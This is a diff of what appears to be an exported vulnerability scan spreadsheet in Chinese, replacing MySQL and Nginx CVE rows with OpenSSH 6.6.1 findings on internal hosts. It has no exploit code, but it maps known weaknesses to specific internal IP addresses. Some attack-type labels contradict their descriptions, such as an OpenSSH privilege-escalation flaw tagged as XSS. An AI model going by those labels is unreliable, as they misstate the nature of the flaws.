&gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X32" t="inlineStr">
@@ -4919,7 +4125,7 @@
     <row r="33">
       <c r="A33" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>OpenSSH 本地信息泄露漏洞(CVE-2016-10011)</t>
         </is>
       </c>
       <c r="B33" t="inlineStr">
@@ -4932,15 +4138,19 @@
           <t>中危</t>
         </is>
       </c>
-      <c r="D33" t="inlineStr"/>
+      <c r="D33" t="inlineStr">
+        <is>
+          <t>权限提升</t>
+        </is>
+      </c>
       <c r="E33" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.openssh.com/txt/release-7.4</t>
         </is>
       </c>
       <c r="F33" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>OpenSSH 7.4之前的版本中的sshd的authfile.c文件中存在安全漏洞。本地攻击者可通过访问privilege-separated子进程利用该漏洞获取敏感的私钥信息。</t>
         </is>
       </c>
       <c r="G33" t="inlineStr">
@@ -4950,37 +4160,37 @@
       </c>
       <c r="H33" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I33" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J33" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2016-10011</t>
         </is>
       </c>
       <c r="K33" t="inlineStr">
         <is>
-          <t>2026-07-13 21:33</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L33" t="inlineStr">
         <is>
-          <t>2026-07-13 21:33</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M33" t="inlineStr">
         <is>
-          <t>192.168.50.143</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N33" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O33" t="inlineStr">
@@ -5002,7 +4212,7 @@
       </c>
       <c r="T33" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U33" t="inlineStr"/>
@@ -5013,29 +4223,7 @@
       </c>
       <c r="W33" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X33" t="inlineStr">
@@ -5052,28 +4240,28 @@
     <row r="34">
       <c r="A34" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>OpenSSH sshd monitor组件欺骗漏洞(CVE-2015-6563)</t>
         </is>
       </c>
       <c r="B34" t="inlineStr">
         <is>
-          <t>尽快修复</t>
+          <t>建议修复</t>
         </is>
       </c>
       <c r="C34" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>低危</t>
         </is>
       </c>
       <c r="D34" t="inlineStr"/>
       <c r="E34" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.0</t>
         </is>
       </c>
       <c r="F34" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）on non-OpenBSD platforms是OpenBSD计划组所维护的一套运行于非OpenBSD（基于BSD的UNIX实现）平台且用于安全访问远程计算机的连接工具。基于non-OpenBSD平台的OpenSSH 6.9及之前版本的sshd中的monitor组件中存在安全漏洞，该漏洞源于程序错误的接收MONITOR_REQ_PAM_INIT_CTX请求中的外部用户名数据。本地攻击者可通过SSH登录访问并控制sshd uid向MONITOR_REQ_PWNAM发送特制的请求，利用该漏洞实施伪造攻击。</t>
         </is>
       </c>
       <c r="G34" t="inlineStr">
@@ -5083,37 +4271,37 @@
       </c>
       <c r="H34" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I34" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J34" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2015-6563</t>
         </is>
       </c>
       <c r="K34" t="inlineStr">
         <is>
-          <t>2026-07-13 21:25</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L34" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M34" t="inlineStr">
         <is>
-          <t>192.168.50.98</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N34" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O34" t="inlineStr">
@@ -5130,12 +4318,12 @@
       </c>
       <c r="S34" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T34" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U34" t="inlineStr"/>
@@ -5146,29 +4334,7 @@
       </c>
       <c r="W34" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X34" t="inlineStr">
@@ -5185,7 +4351,7 @@
     <row r="35">
       <c r="A35" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325)</t>
         </is>
       </c>
       <c r="B35" t="inlineStr">
@@ -5198,15 +4364,19 @@
           <t>高危</t>
         </is>
       </c>
-      <c r="D35" t="inlineStr"/>
+      <c r="D35" t="inlineStr">
+        <is>
+          <t>权限提升</t>
+        </is>
+      </c>
       <c r="E35" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F35" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>OpenSSH 7.2p2及之前版本的sshd中的session.c文件中的‘do_setup_env’函数存在安全漏洞。当程序启用UseLogin功能并且PAM被配置成读取用户主目录中的.pam_environment文件时，本地攻击者可借助/bin/login程序的特制的环境变量利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G35" t="inlineStr">
@@ -5216,37 +4386,37 @@
       </c>
       <c r="H35" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I35" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J35" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2015-8325</t>
         </is>
       </c>
       <c r="K35" t="inlineStr">
         <is>
-          <t>2026-07-13 21:25</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L35" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M35" t="inlineStr">
         <is>
-          <t>192.168.50.98</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N35" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O35" t="inlineStr">
@@ -5263,12 +4433,12 @@
       </c>
       <c r="S35" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T35" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U35" t="inlineStr"/>
@@ -5279,29 +4449,7 @@
       </c>
       <c r="W35" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X35" t="inlineStr">
@@ -5318,7 +4466,7 @@
     <row r="36">
       <c r="A36" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>OpenSSH SSH守护进程安全漏洞(CVE-2016-6210)</t>
         </is>
       </c>
       <c r="B36" t="inlineStr">
@@ -5328,18 +4476,22 @@
       </c>
       <c r="C36" t="inlineStr">
         <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D36" t="inlineStr"/>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D36" t="inlineStr">
+        <is>
+          <t>拒绝服务</t>
+        </is>
+      </c>
       <c r="E36" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.openssh.com/txt/release-7.3</t>
         </is>
       </c>
       <c r="F36" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>远程主机上运行的 OpenSSH 版本早于 7.3存在一个缺陷,造成此缺陷的原因是对于无效用户而言,程序针对密码过长的验证请求返回的响应时间比针对有效用户返回的响应时间短。这可能允许远程攻击者发动时序攻击并枚举有效用户名。</t>
         </is>
       </c>
       <c r="G36" t="inlineStr">
@@ -5349,32 +4501,32 @@
       </c>
       <c r="H36" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I36" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J36" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2016-6210</t>
         </is>
       </c>
       <c r="K36" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L36" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M36" t="inlineStr">
         <is>
-          <t>192.168.54.213</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N36" t="inlineStr">
@@ -5387,11 +4539,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P36" t="inlineStr">
-        <is>
-          <t>test1111</t>
-        </is>
-      </c>
+      <c r="P36" t="inlineStr"/>
       <c r="Q36" t="inlineStr"/>
       <c r="R36" t="inlineStr">
         <is>
@@ -5405,7 +4553,7 @@
       </c>
       <c r="T36" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U36" t="inlineStr"/>
@@ -5416,29 +4564,7 @@
       </c>
       <c r="W36" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X36" t="inlineStr">
@@ -5455,7 +4581,7 @@
     <row r="37">
       <c r="A37" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>OpenSSH 远程权限提升漏洞(CVE-2016-10010)</t>
         </is>
       </c>
       <c r="B37" t="inlineStr">
@@ -5465,18 +4591,22 @@
       </c>
       <c r="C37" t="inlineStr">
         <is>
-          <t>中危</t>
-        </is>
-      </c>
-      <c r="D37" t="inlineStr"/>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D37" t="inlineStr">
+        <is>
+          <t>跨站脚本攻击（XSS）</t>
+        </is>
+      </c>
       <c r="E37" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.4</t>
         </is>
       </c>
       <c r="F37" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>OpenSSH 7.4之前的版本中的sshd存在安全漏洞。本地攻击者可利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G37" t="inlineStr">
@@ -5486,32 +4616,32 @@
       </c>
       <c r="H37" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I37" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J37" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2016-10010</t>
         </is>
       </c>
       <c r="K37" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L37" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M37" t="inlineStr">
         <is>
